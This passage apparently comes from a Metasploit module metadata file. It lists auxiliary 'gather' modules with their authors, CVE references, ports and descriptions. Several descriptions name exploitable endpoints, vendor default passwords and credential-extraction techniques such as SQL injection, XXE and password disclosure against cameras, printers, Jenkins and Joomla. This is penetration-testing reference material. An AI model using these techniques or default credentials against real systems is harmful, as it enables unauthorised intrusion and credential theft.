"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/gather/impersonate_ssl.rb",
"is_install_path": true,
"ref_name": "gather/impersonate_ssl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ipcamera_password_disclosure": {
"name": "JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure",
"full_name": "auxiliary/gather/ipcamera_password_disclosure",
"rank": 300,
"disclosure_date": "2016-08-16",
"type": "auxiliary",
"author": [
"Yakir Wizman",
"h00die"
],
"description": "SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),\n and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)\n allow an unauthenticated user to disclose the username & password by\n requesting the javascript page 'readfile.cgi?query=ADMINID'.\n Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235",
"references": [
"EDB-40254",
"EDB-40263",
"EDB-40264"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-07 15:14:13 +0000",
"path": "/modules/auxiliary/gather/ipcamera_password_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/ipcamera_password_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/java_rmi_registry": {
"name": "Java RMI Registry Interfaces Enumeration",
"full_name": "auxiliary/gather/java_rmi_registry",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module gathers information from an RMI endpoint running an RMI registry\n interface. It enumerates the names bound in a registry and looks up each\n remote reference.",
"references": [
"URL-http://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html"
],
"platform": "",
"arch": "",
"rport": 1099,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/java_rmi_registry.rb",
"is_install_path": true,
"ref_name": "gather/java_rmi_registry",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/jenkins_cred_recovery": {
"name": "Jenkins Domain Credential Recovery",
"full_name": "auxiliary/gather/jenkins_cred_recovery",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Th3R3p0",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will collect Jenkins domain credentials, and uses\n the script console to decrypt each password if anonymous permission\n is allowed.\n\n It has been tested against Jenkins version 1.590, 1.633, and 1.638.",
"references": [
"EDB-38664",
"URL-http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/jenkins_cred_recovery.rb",
"is_install_path": true,
"ref_name": "gather/jenkins_cred_recovery",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/joomla_com_realestatemanager_sqli": {
"name": "Joomla Real Estate Manager Component Error-Based SQL Injection",
"full_name": "auxiliary/gather/joomla_com_realestatemanager_sqli",
"rank": 300,
"disclosure_date": "2015-10-22",
"type": "auxiliary",
"author": [
"Omer Ramic",
"Nixawk"
],
"description": "This module exploits a SQL injection vulnerability in Joomla Plugin\n com_realestatemanager versions 3.7 in order to either enumerate\n usernames and password hashes.",
"references": [
"EDB-38445"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb",
"is_install_path": true,
"ref_name": "gather/joomla_com_realestatemanager_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/joomla_contenthistory_sqli": {
"name": "Joomla com_contenthistory Error-Based SQL Injection",
"full_name": "auxiliary/gather/joomla_contenthistory_sqli",
"rank": 300,
"disclosure_date": "2015-10-22",
"type": "auxiliary",
"author": [
"Asaf Orpani",
"bperry",
"Nixawk"
],
"description": "This module exploits a SQL injection vulnerability in Joomla versions 3.2\n through 3.4.4 in order to either enumerate usernames and password hashes.",
"references": [
"CVE-2015-7297",
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/joomla_contenthistory_sqli.rb",
"is_install_path": true,
"ref_name": "gather/joomla_contenthistory_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/joomla_weblinks_sqli": {
"name": "Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/joomla_weblinks_sqli",
"rank": 300,
"disclosure_date": "2014-03-02",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection\n which allows an attacker to access the database or read arbitrary files as the\n 'mysql' user. This module will only work if the mysql user Joomla is using\n to access the database has the LOAD_FILE permission.",
"references": [
"EDB-31459",
"URL-http://developer.joomla.org/security/578-20140301-core-sql-injection.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/joomla_weblinks_sqli.rb",
"is_install_path": true,
"ref_name": "gather/joomla_weblinks_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/kerberos_enumusers": {
"name": "Kerberos Domain User Enumeration",
"full_name": "auxiliary/gather/kerberos_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matt Byrne <attackdebris@gmail.com>"
],
"description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n the different responses returned by the service for valid and invalid users.",
"references": [
"URL-https://nmap.org/nsedoc/scripts/krb5-enum-users.html"
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
"is_install_path": true,
"ref_name": "gather/kerberos_enumusers",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/konica_minolta_pwd_extract": {
"name": "Konica Minolta Password Extractor",
"full_name": "auxiliary/gather/konica_minolta_pwd_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module will extract FTP and SMB account usernames and passwords\n from Konica Minolta multifunction printer (MFP) devices. Tested models include\n C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.",
"references": [
],
"platform": "",
"arch": "",
"rport": "50001",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb",
"is_install_path": true,
"ref_name": "gather/konica_minolta_pwd_extract",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/lansweeper_collector": {
"name": "Lansweeper Credential Collector",
"full_name": "auxiliary/gather/lansweeper_collector",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sghctoma <tamas.szakaly@praudit.hu>",
"eq <balazs.bucsay@praudit.hu>",
"calderpwn <calderon@websec.mx>"
],
"description": "Lansweeper stores the credentials it uses to scan the computers\n in its Microsoft SQL database. The passwords are XTea-encrypted with a\n 68 character long key, in which the first 8 characters are stored with\n the password in the database and the other 60 is static. Lansweeper, by\n default, creates an MSSQL user \"lansweeperuser\" with the password is\n \"mysecretpassword0*\", and stores its data in a database called\n \"lansweeperdb\". This module will query the MSSQL database for the\n credentials.",
"references": [
"URL-http://www.lansweeper.com",
"URL-http://www.praudit.hu/prauditeng/index.php/blog/a-lansweeper-es-a-tea"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/lansweeper_collector.rb",
"is_install_path": true,
"ref_name": "gather/lansweeper_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/mantisbt_admin_sqli": {
"name": "MantisBT Admin SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/mantisbt_admin_sqli",
"rank": 300,
"disclosure_date": "2014-02-28",
"type": "auxiliary",
"author": [
"Jakub Galczyk",
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if\n an attacker can gain access to administrative credentials.\n\n This vuln was fixed in 1.2.17.",
"references": [
"CVE-2014-2238",
"URL-http://www.mantisbt.org/bugs/view.php?id=17055"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/mantisbt_admin_sqli.rb",
"is_install_path": true,
"ref_name": "gather/mantisbt_admin_sqli",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/mcafee_epo_xxe": {
"name": "McAfee ePolicy Orchestrator Authenticated XXE Credentials Exposure",
"full_name": "auxiliary/gather/mcafee_epo_xxe",
"rank": 300,
"disclosure_date": "2015-01-06",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module will exploit an authenticated XXE vulnerability to read the keystore.properties\n off of the filesystem. This properties file contains an encrypted password that is set during\n installation. What is interesting about this password is that it is set as the same password\n as the database 'sa' user and of the admin user created during installation. This password\n is encrypted with a static key, and is encrypted using a weak cipher (ECB). By default,\n if installed with a local SQL Server instance, the SQL Server is listening on all interfaces.\n\n Recovering this password allows an attacker to potentially authenticate as the 'sa' SQL Server\n user in order to achieve remote command execution with permissions of the database process. If\n the administrator has not changed the password for the initially created account since installation,\n the attacker will have the password for this account. By default, 'admin' is recommended.\n\n Any user account can be used to exploit this, all that is needed is a valid credential.\n\n The most data that can be successfully retrieved is 255 characters due to length restrictions\n on the field used to perform the XXE attack.",
"references": [
"CVE-2015-0921",
"CVE-2015-0922",
"URL-https://seclists.org/fulldisclosure/2015/Jan/8"
],
"platform": "",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/mcafee_epo_xxe.rb",
"is_install_path": true,
"ref_name": "gather/mcafee_epo_xxe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/memcached_extractor": {
"name": "Memcached Extractor",
"full_name": "auxiliary/gather/memcached_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Paul Deardorff <paul_deardorff@rapid7.com>"
],
"description": "This module extracts the slabs from a memcached instance. It then\n finds the keys and values stored in those slabs.",
"references": [
"URL-https://github.com/memcached/memcached/blob/master/doc/protocol.txt"
],
"platform": "",
"arch": "",
"rport": 11211,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/memcached_extractor.rb",
"is_install_path": true,
"ref_name": "gather/memcached_extractor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/mongodb_js_inject_collection_enum": {
"name": "MongoDB NoSQL Collection Enumeration Via Injection",
"full_name": "auxiliary/gather/mongodb_js_inject_collection_enum",
"rank": 300,
"disclosure_date": "2014-06-07",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module can exploit NoSQL injections on MongoDB versions less than 2.4\n and enumerate the collections available in the data via boolean injections.",
"references": [
"URL-http://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-node-js-server-side-javascript"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb",
"is_install_path": true,
"ref_name": "gather/mongodb_js_inject_collection_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/ms14_052_xmldom": {
"name": "MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure",
"full_name": "auxiliary/gather/ms14_052_xmldom",
"rank": 300,
"disclosure_date": "2014-09-09",
"type": "auxiliary",
"author": [
"Soroush Dalili",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will use the Microsoft XMLDOM object to enumerate a remote machine's filenames.\n It will try to do so against Internet Explorer 8 and Internet Explorer 9. To use it, you\n must supply your own list of file paths. Each file path should look like this:\n c:\\\\windows\\\\system32\\\\calc.exe",
"references": [
"CVE-2013-7331",
"MSB-MS14-052",
"URL-https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/",
"URL-https://www.alienvault.com/open-threat-exchange/blog/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/ms14_052_xmldom.rb",
"is_install_path": true,
"ref_name": "gather/ms14_052_xmldom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/mybb_db_fingerprint": {
"name": "MyBB Database Fingerprint",
"full_name": "auxiliary/gather/mybb_db_fingerprint",
"rank": 300,
"disclosure_date": "2014-02-13",
"type": "auxiliary",
"author": [
"Arthur Karmanovskii <fnsnic@gmail.com>"
],
"description": "This module checks if MyBB is running behind an URL. Also uses a malformed query to\n force an error and fingerprint the backend database used by MyBB on version 1.6.12\n and prior.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/mybb_db_fingerprint.rb",
"is_install_path": true,
"ref_name": "gather/mybb_db_fingerprint",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/natpmp_external_address": {
"name": "NAT-PMP External Address Scanner",
"full_name": "auxiliary/gather/natpmp_external_address",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jhart@spoofed.org>"
],
"description": "Scan NAT devices for their external address using NAT-PMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5351,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/natpmp_external_address.rb",
"is_install_path": true,
"ref_name": "gather/natpmp_external_address",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/netgear_password_disclosure": {
"name": "NETGEAR Administrator Password Disclosure",
"full_name": "auxiliary/gather/netgear_password_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Simon Kenin",
"thecarterb"
],
"description": "This module will collect the password for the `admin` user.\n The exploit will not complete if password recovery is set on the router.\n The password is received by passing the token generated from `unauth.cgi`\n to `passwordrecovered.cgi`. This exploit works on many different NETGEAR\n products. The full list of affected products is available in the 'References'\n section.",
"references": [
"CVE-2017-5521",
"URL-https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911",
"URL-http://thehackernews.com/2017/01/Netgear-router-password-hacking.html",
"URL-https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/",
"URL-http://pastebin.com/dB4bTgxz",
"EDB-41205"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/netgear_password_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/netgear_password_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nis_bootparamd_domain": {
"name": "NIS bootparamd Domain Name Disclosure",
"full_name": "auxiliary/gather/nis_bootparamd_domain",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"SATAN",
"pentestmonkey",
"wvu <wvu@metasploit.com>"
],
"description": "This module discloses the NIS domain name from bootparamd.\n\n You must know a client address from the target's bootparams file.\n\n Hint: try hosts within the same network range as the target.",
"references": [
"URL-https://tools.ietf.org/html/rfc1831",
"URL-https://tools.ietf.org/html/rfc4506",
"URL-http://pentestmonkey.net/blog/nis-domain-name"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-13 22:55:01 +0000",
"path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb",
"is_install_path": true,
"ref_name": "gather/nis_bootparamd_domain",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nis_ypserv_map": {
"name": "NIS ypserv Map Dumper",
"full_name": "auxiliary/gather/nis_ypserv_map",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module dumps the specified map from NIS ypserv.\n\n The following examples are from ypcat -x:\n\n Use \"ethers\" for map \"ethers.byname\"\n Use \"aliases\" for map \"mail.aliases\"\n Use \"services\" for map \"services.byname\"\n Use \"protocols\" for map \"protocols.bynumber\"\n Use \"hosts\" for map \"hosts.byname\"\n Use \"networks\" for map \"networks.byaddr\"\n Use \"group\" for map \"group.byname\"\n Use \"passwd\" for map \"passwd.byname\"\n\n You may specify a map by one of the nicknames above.",
"references": [
"URL-https://tools.ietf.org/html/rfc1831",
"URL-https://tools.ietf.org/html/rfc4506"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-01-13 22:55:01 +0000",
"path": "/modules/auxiliary/gather/nis_ypserv_map.rb",
"is_install_path": true,
"ref_name": "gather/nis_ypserv_map",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nuuo_cms_bruteforce": {
"name": "Nuuo Central Management Server User Session Token Bruteforce",
"full_name": "auxiliary/gather/nuuo_cms_bruteforce",
"rank": 300,
"disclosure_date": "2018-10-11",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Nuuo Central Management Server below version 2.4 has a flaw where it sends the\n heap address of the user object instead of a real session number when a user logs\n in. This can be used to reduce the keyspace for the session number from 10 million\n to 1.2 million, and with a bit of analysis it can be guessed in less than 500k tries.\n This module does exactly that - it uses a computed occurence table to try the most common\n combinations up to 1.2 million to try to guess a valid user session.\n This session number can then be used to achieve code execution or download files - see\n the other Nuuo CMS auxiliary and exploit modules.\n Note that for this to work a user has to be logged into the system.",
"references": [
"CVE-2018-17888",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-24 07:01:42 +0000",
"path": "/modules/auxiliary/gather/nuuo_cms_bruteforce.rb",
"is_install_path": true,
"ref_name": "gather/nuuo_cms_bruteforce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/nuuo_cms_file_download": {
"name": "Nuuo Central Management Server Authenticated Arbitrary File Download",
"full_name": "auxiliary/gather/nuuo_cms_file_download",
"rank": 300,
"disclosure_date": "2018-10-11",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "The Nuuo Central Management Server allows an authenticated user to download files from the\n installation folder. This functionality can be abused to obtain administrative credentials,\n the SQL Server database password and arbitrary files off the system with directory traversal.\n The module will attempt to download CMServer.cfg (the user configuration file with all the user\n passwords including the admin one), ServerConfig.cfg (the server configuration file with the\n SQL Server password) and a third file if the FILE argument is provided by the user.\n The two .cfg files are zip-encrypted files, but due to limitations of the Ruby ZIP modules\n included in Metasploit, these files cannot be decrypted programmatically. The user will\n have to open them with zip or a similar program and provide the default password \"NUCMS2007!\".\n This module will either use a provided session number (which can be guessed with an auxiliary\n module) or attempt to login using a provided username and password - it will also try the\n default credentials if nothing is provided.\n All versions of CMS server up to and including 3.5 are vulnerable to this attack.",
"references": [
"CVE-2018-17934",
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02",
"URL-https://seclists.org/fulldisclosure/2019/Jan/51",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt"
],
"platform": "Windows",
"arch": "",
"rport": 5180,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-19 14:26:35 +0000",
"path": "/modules/auxiliary/gather/nuuo_cms_file_download.rb",
"is_install_path": true,
"ref_name": "gather/nuuo_cms_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/opennms_xxe": {
"name": "OpenNMS Authenticated XXE",
"full_name": "auxiliary/gather/opennms_xxe",
"rank": 300,
"disclosure_date": "2015-01-08",
"type": "auxiliary",
"author": [
"Stephen Breen <breenmachine@gmail.com>",
"Justin Kennedy <jstnkndy@gmail.com>"
],
"description": "OpenNMS is vulnerable to XML External Entity Injection in the Real-Time Console interface.\n Although this attack requires authentication, there are several factors that increase the\n severity of this vulnerability.\n\n 1. OpenNMS runs with root privileges, taken from the OpenNMS FAQ: \"The difficulty with the\n core of OpenNMS is that these components need to run as root to be able to bind to low-numbered\n ports or generate network traffic that requires root\"\n\n 2. The user that you must authenticate as is the \"rtc\" user which has the default password of\n \"rtc\". There is no mention of this user in the installation guides found here:\n http://www.opennms.org/wiki/Tutorial_Installation, only mention that you should change the default\n admin password of \"admin\" for security purposes.",
"references": [
"CVE-2015-0975"
],
"platform": "",
"arch": "",
"rport": 8980,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/opennms_xxe.rb",
"is_install_path": true,
"ref_name": "gather/opennms_xxe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/pimcore_creds_sqli": {
"name": "Pimcore Gather Credentials via SQL Injection",
"full_name": "auxiliary/gather/pimcore_creds_sqli",
"rank": 300,
"disclosure_date": "2018-08-13",
"type": "auxiliary",
"author": [
"Thongchai Silpavarangkura",
"N. Rai-Ngoen",
"Shelby Pace"
],
"description": "This module extracts the usernames and hashed passwords of all users of\n the Pimcore web service by exploiting a SQL injection vulnerability in\n Pimcore's REST API.\n\n Pimcore begins to create password hashes by concatenating a user's\n username, the name of the application, and the user's password in the\n format USERNAME:pimcore:PASSWORD.\n\n The resulting string is then used to generate an MD5 hash, and then that\n MD5 hash is used to create the final hash, which is generated using\n PHP's built-in password_hash function.",
"references": [
"CVE-2018-14058",
"EDB-45208"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-27 12:31:04 +0000",
"path": "/modules/auxiliary/gather/pimcore_creds_sqli.rb",
"is_install_path": true,
"ref_name": "gather/pimcore_creds_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"ioc-in-logs"
]
}
},
"auxiliary_gather/qnap_backtrace_admin_hash": {
"name": "QNAP NAS/NVR Administrator Hash Disclosure",
"full_name": "auxiliary/gather/qnap_backtrace_admin_hash",
"rank": 300,
"disclosure_date": "2017-01-31",
"type": "auxiliary",
"author": [
"bashis",
"wvu <wvu@metasploit.com>",
"Donald Knuth"
],
"description": "This module exploits combined heap and stack buffer overflows for QNAP\n NAS and NVR devices to dump the admin (root) shadow hash from memory via\n an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.\n\n A binary search is performed to find the correct offset for the BOFs.\n Since the server forks, blind remote exploitation is possible, provided\n the heap does not have ASLR.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Feb/2",
"URL-https://en.wikipedia.org/wiki/Binary_search_algorithm"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb",
"is_install_path": true,
"ref_name": "gather/qnap_backtrace_admin_hash",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/rails_doubletap_file_read": {
"name": "Ruby On Rails File Content Disclosure ('doubletap')",
"full_name": "auxiliary/gather/rails_doubletap_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carter Brainerd <0xCB@protonmail.com>",
"John Hawthorn <john@hawthorn.email>"
],
"description": "This module uses a path traversal vulnerability in Ruby on Rails\n versions =< 5.2.2 to read files on a target server.",
"references": [
"URL-https://hackerone.com/reports/473888",
"URL-https://github.com/mpgn/Rails-doubletap-RCE",
"URL-https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q",
"URL-https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/",
"CVE-2019-5418",
"EDB-46585"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-21 12:00:20 +0000",
"path": "/modules/auxiliary/gather/rails_doubletap_file_read.rb",
"is_install_path": true,
"ref_name": "gather/rails_doubletap_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"DoubleTap"
]
}
},
"auxiliary_gather/safari_file_url_navigation": {
"name": "Mac OS X Safari file:// Redirection Sandbox Escape",
"full_name": "auxiliary/gather/safari_file_url_navigation",
"rank": 300,
"disclosure_date": "2014-01-16",
"type": "auxiliary",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a\n \"state management issue\" that allows a browser window to be navigated\n to a file:// URL. By dropping and loading a malicious .webarchive file,\n an attacker can read arbitrary files, inject cross-domain Javascript, and\n silently install Safari extensions.",
"references": [
"ZDI-15-228",
"CVE-2015-1155",
"URL-https://support.apple.com/en-us/HT204826"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/safari_file_url_navigation.rb",
"is_install_path": true,
"ref_name": "gather/safari_file_url_navigation",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/samsung_browser_sop_bypass": {
"name": "Samsung Internet Browser SOP Bypass",
"full_name": "auxiliary/gather/samsung_browser_sop_bypass",
"rank": 300,
"disclosure_date": "2017-11-08",
"type": "auxiliary",
"author": [
"Dhiraj Mishra",
"Tod Beardsley",
"Jeffrey Martin"
],
"description": "This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the\n Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.\n By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather\n credentials via a fake pop-up.",
"references": [
"CVE-2017-17692",
"URL-http://fr.0day.today/exploit/description/28434"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
